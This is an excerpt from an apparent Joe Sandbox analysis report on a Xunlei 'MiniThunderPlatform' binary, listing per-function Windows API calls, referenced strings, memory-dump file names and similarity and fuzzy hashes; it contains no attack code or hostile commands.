                                                                                                                                              • ??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ.MSVCP71 ref: 00431A0B
                                                                                                                                              Strings
                                                                                                                                              • _mini_tpstart_up_e_20130515_360, xrefs: 0043196E
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1614044465.0000000000417000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1614008254.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1614044465.0000000000448000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1614044465.0000000000456000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1614158449.000000000045A000.00000080.00000001.01000000.0000000F.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1614181616.000000000045C000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: U?$char_traits@_V?$allocator@_W@2@@std@@W@std@@$V01@Y?$basic_string@_$??0?$basic_string@_??1?$basic_string@_?data@?$basic_string@_ErrorEventLastOpenV01@@
                                                                                                                                              • String ID: _mini_tpstart_up_e_20130515_360
                                                                                                                                              • API String ID: 2803960666-1174414084
                                                                                                                                              APIs
                                                                                                                                              • CreateFileA.KERNEL32(00000002,C0000000,00000001,00000000,00000003,00000080,00000000,102FE990,?,00000000), ref: 10026B17
                                                                                                                                              • GetLastError.KERNEL32(?,00000000), ref: 10026B25
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(open file:,?,00000000), ref: 10026B36
                                                                                                                                              • ?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71 ref: 10026B4C
                                                                                                                                              • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP71( error ), ref: 10026B5B
                                                                                                                                              • _CxxThrowException.MSVCR71(?,102B5DEC,?,00000000), ref: 10026B7A
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??0?$basic_string@?append@?$basic_string@CreateErrorExceptionFileLastThrowV01@V12@V12@@Y?$basic_string@
                                                                                                                                              • String ID: error $open file:
                                                                                                                                              • API String ID: 708047030-1055500812
                                                                                                                                              APIs
                                                                                                                                              • GetTempPathW.KERNEL32(00000104,?), ref: 0042E8EE
                                                                                                                                              • ??0?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@PB_W@Z.MSVCP71(00448C70), ref: 0042E8FF
                                                                                                                                              • lstrcatW.KERNEL32(?,Xunlei), ref: 0042E917
                                                                                                                                              • GetFileAttributesW.KERNEL32(?), ref: 0042E91D
                                                                                                                                              • CreateDirectoryW.KERNEL32(?,00000000), ref: 0042E92E
                                                                                                                                              • lstrcatW.KERNEL32(?,00448CD4), ref: 0042E93D
                                                                                                                                              • ??0?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@PB_W@Z.MSVCP71(?), ref: 0042E945
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1614044465.0000000000417000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1614008254.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1614044465.0000000000448000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1614044465.0000000000456000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1614158449.000000000045A000.00000080.00000001.01000000.0000000F.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1614181616.000000000045C000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ??0?$basic_string@_U?$char_traits@_V?$allocator@_W@2@@std@@W@std@@lstrcat$AttributesCreateDirectoryFilePathTemp
                                                                                                                                              • String ID: Xunlei
                                                                                                                                              • API String ID: 4113646224-3606950124
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 10010E98: memset.MSVCR71(?,00000000,00000094,00000000,?), ref: 10010EBB
                                                                                                                                                • Part of subcall function 10010E98: GetVersionExA.KERNEL32(?,?,00000000,?), ref: 10010ED0
                                                                                                                                                • Part of subcall function 10010E98: GetVersionExA.KERNEL32(?,?,00000000,?), ref: 10010EDD
                                                                                                                                              • LoadLibraryW.KERNEL32(shell32.dll,?,?,10010FE1,?,?,?,10011901,?,10012105), ref: 10010F19
                                                                                                                                              • GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 10010F29
                                                                                                                                              • wcslen.MSVCR71(00000000,?,?,10010FE1,?,?), ref: 10010F4D
                                                                                                                                              • CoTaskMemFree.COMBASE(00000000), ref: 10010F5C
                                                                                                                                              • wcscpy.MSVCR71(?,00000000,?,10010FE1,?,?), ref: 10010F69
                                                                                                                                              • CoTaskMemFree.COMBASE(00000000), ref: 10010F74
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FreeTaskVersion$AddressLibraryLoadProcmemsetwcscpywcslen
                                                                                                                                              • String ID: SHGetKnownFolderPath$shell32.dll
                                                                                                                                              • API String ID: 1429141912-2936008475
                                                                                                                                              • Opcode ID: d1b8ed3d7d5f8828301b08eabc560b144e0b8a0aceba030aa62a8eab4fecb4be
                                                                                                                                              • Instruction ID: 40fd898d1aef6dd0312774801b55effdd2640996a0e6f2f98d44bd0ee8339355
                                                                                                                                              • Opcode Fuzzy Hash: d1b8ed3d7d5f8828301b08eabc560b144e0b8a0aceba030aa62a8eab4fecb4be
                                                                                                                                              • Instruction Fuzzy Hash: 18014F31604205FFDF69DBA1CC4EB9E7BA5EF14365F508129F501D80A1DFB2EA91EA20
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 1005CBA0: ??$?8DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP71(?,102768F0,?,00000020,00000024,00000000), ref: 1005CBFD
                                                                                                                                                • Part of subcall function 1005CBA0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(102768F0), ref: 1005CC11
                                                                                                                                                • Part of subcall function 1005CBA0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1005CC27
                                                                                                                                              • ??$?8DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP71 ref: 1005C6D5
                                                                                                                                              • fopen.MSVCR71(?,1027E7C0), ref: 1005C6FB
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,00000020,00000024,00000000), ref: 1005C712
                                                                                                                                              • fread.MSVCR71(?,00000001,00000001,00000000), ref: 1005C762
                                                                                                                                              • getc.MSVCR71(00000000), ref: 1005C7A4
                                                                                                                                              • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP71(?), ref: 1005C7D8
                                                                                                                                              • fclose.MSVCR71(00000000), ref: 1005C7F9
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1005C80E
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1005C823
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@std@@U?$char_traits@V?$allocator@$D@2@@std@@$??1?$basic_string@$??$?8??0?$basic_string@D@1@@std@@D@2@@0@V?$basic_string@$??4?$basic_string@V01@fclosefopenfreadgetc
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1129157471-0
                                                                                                                                              • Opcode ID: 453e60a8e93f37fe1e268c0121e1c355fb513e1b3bf372eb74b26329953307d7
                                                                                                                                              • Instruction ID: baf83c83f94484c1d2866acb306b3f02caf3edcd32b72ebf64701c488e90f38c
                                                                                                                                              • Opcode Fuzzy Hash: 453e60a8e93f37fe1e268c0121e1c355fb513e1b3bf372eb74b26329953307d7
                                                                                                                                              • Instruction Fuzzy Hash: B041C07040C3898FD720CF28C888B9ABBE8EB89744F404B5DF99686552D774984DCBA7
                                                                                                                                              APIs
                                                                                                                                              • RtlEnterCriticalSection.NTDLL ref: 1013BC76
                                                                                                                                              • recvfrom.WS2_32(?,?,?,00000000,?,76105E10), ref: 1013BCB7
                                                                                                                                              • inet_ntoa.WS2_32(?), ref: 1013BD1A
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(00000000), ref: 1013BD29
                                                                                                                                              • htons.WS2_32(?), ref: 1013BD45
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1013BD60
                                                                                                                                              • RtlLeaveCriticalSection.NTDLL(10304E30), ref: 1013BD7F
                                                                                                                                              • WSAGetLastError.WS2_32 ref: 1013BDA5
                                                                                                                                              • RtlLeaveCriticalSection.NTDLL(10304E30), ref: 1013BDB0
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CriticalSection$D@2@@std@@D@std@@LeaveU?$char_traits@V?$allocator@$??0?$basic_string@??1?$basic_string@EnterErrorLasthtonsinet_ntoarecvfrom
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3988946783-0
                                                                                                                                              • Opcode ID: 80da3f1bef030d0e230fe6a1e278386f2f1f5cf6eaba33b4ccc2a5b577c00543
                                                                                                                                              • Instruction ID: f11eda9272dfa321cd544337cbb05ca802c4f3d20dac908532b1b80b9f3e271e
                                                                                                                                              • Opcode Fuzzy Hash: 80da3f1bef030d0e230fe6a1e278386f2f1f5cf6eaba33b4ccc2a5b577c00543
                                                                                                                                              • Instruction Fuzzy Hash: E9418CB11043419FC350DF64C98CB9BBBF9FB88725F408A1DF54A87261EB39A845CB21
                                                                                                                                              APIs
                                                                                                                                              • WSAEnumNetworkEvents.WS2_32(?,?,?), ref: 1003CBDF
                                                                                                                                              • WSAGetLastError.WS2_32 ref: 1003CBEA
                                                                                                                                                • Part of subcall function 100261B0: __EH_prolog.LIBCMT ref: 100261B5
                                                                                                                                                • Part of subcall function 100261B0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(?,?,?), ref: 100261DE
                                                                                                                                                • Part of subcall function 100261B0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(00000000,?,?), ref: 1002620C
                                                                                                                                                • Part of subcall function 100261B0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?), ref: 10026226
                                                                                                                                                • Part of subcall function 100261B0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?), ref: 1002623C
                                                                                                                                                • Part of subcall function 100261B0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,?,?), ref: 1002625A
                                                                                                                                                • Part of subcall function 10038CC0: RtlEnterCriticalSection.NTDLL(?), ref: 10038CFA
                                                                                                                                                • Part of subcall function 10038CC0: RtlLeaveCriticalSection.NTDLL(?), ref: 10038D17
                                                                                                                                                • Part of subcall function 10038CC0: ??3@YAXPAX@Z.MSVCR71(?), ref: 10038D53
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??1?$basic_string@$??0?$basic_string@CriticalSection$??3@EnterEnumErrorEventsH_prologLastLeaveNetworkV01@@
                                                                                                                                              • String ID: .\connect_manager.cpp$_connecting_queue.count(event_handle)$_connecting_queue[event_handle]._opt_type == operation_type_connect$socket_handle$thunder_assert
                                                                                                                                              • API String ID: 542771531-4289252589
                                                                                                                                              • Opcode ID: 4551cdc49ceedad96f79ed0166ec5f5f9382e271861b590d33b93e580144a5d4
                                                                                                                                              • Instruction ID: b2910c7472a869938b619ec3702e6980a3c3f4ed1ca157dc4a82d6e856577f9e
                                                                                                                                              • Opcode Fuzzy Hash: 4551cdc49ceedad96f79ed0166ec5f5f9382e271861b590d33b93e580144a5d4
                                                                                                                                              • Instruction Fuzzy Hash: 364119753006086FC211EA259C42E6FB3EDEFD5216F00841DFA4A9B242DB31B915C7B6
                                                                                                                                              APIs
                                                                                                                                              • ??0?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@ABV01@@Z.MSVCP71(?), ref: 004326BC
                                                                                                                                              • ??Y?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAEAAV01@PB_W@Z.MSVCP71(_mini_tpr_e_2013515_360), ref: 004326E6
                                                                                                                                              • ??Y?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAEAAV01@PB_W@Z.MSVCP71(00449980), ref: 00432709
                                                                                                                                              • ?data@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QBEPB_WXZ.MSVCP71 ref: 0043271B
                                                                                                                                              • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 00432731
                                                                                                                                              • ??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ.MSVCP71 ref: 00432768
                                                                                                                                              Strings
                                                                                                                                              • _mini_tpr_e_2013515_360, xrefs: 004326DE
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1614044465.0000000000417000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1614008254.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1614044465.0000000000448000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1614044465.0000000000456000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1614158449.000000000045A000.00000080.00000001.01000000.0000000F.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1614181616.000000000045C000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: U?$char_traits@_V?$allocator@_W@2@@std@@W@std@@$V01@Y?$basic_string@_$??0?$basic_string@_??1?$basic_string@_?data@?$basic_string@_CreateEventV01@@
                                                                                                                                              • String ID: _mini_tpr_e_2013515_360
                                                                                                                                              • API String ID: 1874928642-2919975160
                                                                                                                                              • Opcode ID: 5d8f73b69650695dd343739c33bd3ff33feb6ee042267c5f3a15f6bf93b0d2e6
                                                                                                                                              • Instruction ID: 78b4793443b79c058a6f1eb5f7eb92cdf835383bfe05c3ac2b965819d0ab28fb
                                                                                                                                              • Opcode Fuzzy Hash: 5d8f73b69650695dd343739c33bd3ff33feb6ee042267c5f3a15f6bf93b0d2e6
                                                                                                                                              • Instruction Fuzzy Hash: 92310BB2D00608ABDB10FB69EC82BDCB734EB04314F51422AF515A7281DF785D88C795
                                                                                                                                              APIs
                                                                                                                                              • ??0?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@ABV01@@Z.MSVCP71(?), ref: 004328BC
                                                                                                                                              • ??Y?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAEAAV01@PB_W@Z.MSVCP71(_mini_tpw_e_2013515_360), ref: 004328E6
                                                                                                                                              • ??Y?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAEAAV01@PB_W@Z.MSVCP71(00449980), ref: 00432909
                                                                                                                                              • ?data@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QBEPB_WXZ.MSVCP71 ref: 0043291B
                                                                                                                                              • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 00432931
                                                                                                                                              • ??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ.MSVCP71 ref: 00432968
                                                                                                                                              Strings
                                                                                                                                              • _mini_tpw_e_2013515_360, xrefs: 004328DE
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1614044465.0000000000417000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1614008254.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1614044465.0000000000448000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1614044465.0000000000456000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1614158449.000000000045A000.00000080.00000001.01000000.0000000F.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1614181616.000000000045C000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: U?$char_traits@_V?$allocator@_W@2@@std@@W@std@@$V01@Y?$basic_string@_$??0?$basic_string@_??1?$basic_string@_?data@?$basic_string@_CreateEventV01@@
                                                                                                                                              • String ID: _mini_tpw_e_2013515_360
                                                                                                                                              • API String ID: 1874928642-2643261043
                                                                                                                                              APIs
                                                                                                                                              • wcslen.MSVCR71(10311B98,00000000,?,00000104), ref: 10011426
                                                                                                                                              • wcslen.MSVCR71(10311B98), ref: 100114AB
                                                                                                                                                • Part of subcall function 1001103C: memset.MSVCR71(?,00000000,00000208,10311990), ref: 10011061
                                                                                                                                                • Part of subcall function 1001103C: GetModuleHandleW.KERNEL32(00000000,?,?,10311990), ref: 1001106B
                                                                                                                                                • Part of subcall function 1001103C: GetModuleFileNameW.KERNEL32(00000000,?,00000104,?,?,10311990), ref: 1001107E
                                                                                                                                              • wcscpy.MSVCR71(?,10311B98), ref: 100114BF
                                                                                                                                                • Part of subcall function 10010F89: wcslen.MSVCR71(?,7C363127,10311990,00000104,100113A3,?,00000104,uuid), ref: 10010F97
                                                                                                                                                • Part of subcall function 10010F89: wcslen.MSVCR71(?), ref: 10010F9F
                                                                                                                                              • GetPrivateProfileStringW.KERNEL32(data,uuid,102780C0,10311B98,00000208,?), ref: 1001147A
                                                                                                                                              • wcslen.MSVCR71(10311B98), ref: 10011481
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: wcslen$Module$FileHandleNamePrivateProfileStringmemsetwcscpy
                                                                                                                                              • String ID: data$uuid
                                                                                                                                              • API String ID: 1540464159-3828501146
                                                                                                                                              APIs
                                                                                                                                              • wcslen.MSVCR71(10311990,00000000,?,00000104), ref: 10011372
                                                                                                                                              • wcslen.MSVCR71(10311990), ref: 100113CD
                                                                                                                                                • Part of subcall function 1001103C: memset.MSVCR71(?,00000000,00000208,10311990), ref: 10011061
                                                                                                                                                • Part of subcall function 1001103C: GetModuleHandleW.KERNEL32(00000000,?,?,10311990), ref: 1001106B
                                                                                                                                                • Part of subcall function 1001103C: GetModuleFileNameW.KERNEL32(00000000,?,00000104,?,?,10311990), ref: 1001107E
                                                                                                                                              • wcscpy.MSVCR71(?,10311990), ref: 100113E1
                                                                                                                                                • Part of subcall function 10010F89: wcslen.MSVCR71(?,7C363127,10311990,00000104,100113A3,?,00000104,uuid), ref: 10010F97
                                                                                                                                                • Part of subcall function 10010F89: wcslen.MSVCR71(?), ref: 10010F9F
                                                                                                                                              • GetPrivateProfileStringW.KERNEL32(data,path,102780C0,10311990,00000208,?), ref: 100113C6
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: wcslen$Module$FileHandleNamePrivateProfileStringmemsetwcscpy
                                                                                                                                              • String ID: data$path$uuid
                                                                                                                                              • API String ID: 1540464159-3004642934
                                                                                                                                              APIs
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDI@Z.MSVCP71(?,?), ref: 1000547F
                                                                                                                                              • ?find_first_not_of@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI@Z.MSVCP71(0123456789,00000000), ref: 1000548F
                                                                                                                                              • init.DOWNLOAD_ENGINE(?), ref: 100054BE
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100054D9
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100054E2
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??1?$basic_string@$??0?$basic_string@?find_first_not_of@?$basic_string@init
                                                                                                                                              • String ID: 0123456789
                                                                                                                                              • API String ID: 4149508285-2793719750
                                                                                                                                              APIs
                                                                                                                                              • GetTickCount.KERNEL32 ref: 100559F4
                                                                                                                                                • Part of subcall function 10001482: __EH_prolog.LIBCMT ref: 10001487
                                                                                                                                                • Part of subcall function 10001482: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?,10277ABC), ref: 1000149A
